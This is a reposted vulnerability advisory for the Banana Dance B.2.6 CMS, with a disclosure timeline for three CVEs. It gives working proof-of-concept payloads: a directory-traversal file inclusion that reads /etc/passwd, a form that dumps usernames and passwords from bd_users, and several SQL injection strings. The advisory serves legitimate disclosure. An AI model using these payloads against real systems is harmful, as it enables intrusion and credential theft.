|
|
|
|
| |
Credit:
The original article can be found at: https://www.htbridge.com/advisory/HTB23118
|
| |
Vulnerable Systems:
* Banana Dance B.2.6 and probably prior
1) PHP File Inclusion in Banana Dance: CVE-2012-5242
Input passed via the "name" POST parameter to "/functions/ajax.php" is not properly verified before being used in
"include_once()" function and can be exploited to include arbitrary local files. This can be exploited to include local
files via directory traversal sequences and URL-encoded NULL bytes.
The following PoC (Prof-of-Concept) demonstrates the vulnerability:
POST /functions/ajax.php HTTP/1.1
action=get_template&name=../../../../../etc/passwd%00
2) Improper Access Control in Banana Dance: CVE-2012-5243
The application does not restrict access to the "/functions/suggest.php" script to unauthenticated users. A remote
attacker can read arbitrary information from database.
The following PoC reads data from the 'bd_users' table:
<form action="http://[host]/functions/suggest.php"; method="post">
<input type="hidden" name="return" value="username" />
<input type="hidden" name="display" value="password" />
<input type="hidden" name="table" value="bd_users" />
<input type="hidden" name="search" value="id" />
<input type="hidden" name="value" value="%" />
<input type="submit" id="btn">
</form>
3) SQL Injection in Banana Dance: CVE-2012-5244
3.1 Input passed via the "return", "display", "table" and "search" POST parameters to "/functions/suggest.php" is not
properly sanitised before being used in SQL query. Although the "mysql_real_escape_string()" function is called on the
input it has no effect due to usage of the ` quotes in SQL query. This vulnerability can be exploited to manipulate SQL
queries by injecting arbitrary SQL code.
The following PoC demonstrates the vulnerability:
<form action="http://[host]/functions/suggest.php"; method="post">
<input type="hidden" name="return" value="id`,version() AS version FROM bd_users LIMIT 1 -- " />
<input type="hidden" name="display" value="version" />
<input type="submit" id="btn">
</form>
3.2 Input passed via the "id" GET parameter to "/functions/widgets.php" is not properly sanitised before being used in
SQL query. This vulnerability can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
The following PoC demonstrates the vulnerability:
http://[host]/functions/widgets.php?action=get_widget&id=%27%20OR%201=%28select%20min%28 ()
a:=1%29from%20%28select%201%20union%20select%202%29k%20group%20by%20%28select%20concat%28@@version,0x0,@a:=%28 ()
a%2b1%29%2%29%29%29%20--%20
3.3 Input passed via the "category" GET parameter to "/functions/print.php" is not properly sanitised before being used
in SQL query. This vulnerability can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
The following PoC demonstrates the vulnerability:
http://[host]/functions/print.php?category=0%27%20UNION%20SELECT%20version%28%29%20--%202
3.4 Input passed via the "name" GET parameter to "/functions/ajax.php" is not properly sanitised before being used in
SQL query. This vulnerability can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
The following PoC demonstrates the vulnerability:
<form action="http://[host]/functions/ajax.php"; method="post">
<input type="hidden" name="action" value="get_template" />
<input type="hidden" name="name" value="' OR 1=(select min(@a:=1)from (select 1 union select 2)k group by (select
concat(@@version,0x0,@a:=(@a+1)%2))) -- " />
<input type="submit" id="btn">
</form>
CVE Information:
CVE-2012-5242
CVE-2012-5243
CVE-2012-5244
Disclosure Timeline:
Vendor Notification: October 3, 2012
Public Disclosure: December 19, 2012
|
|
|
|
|
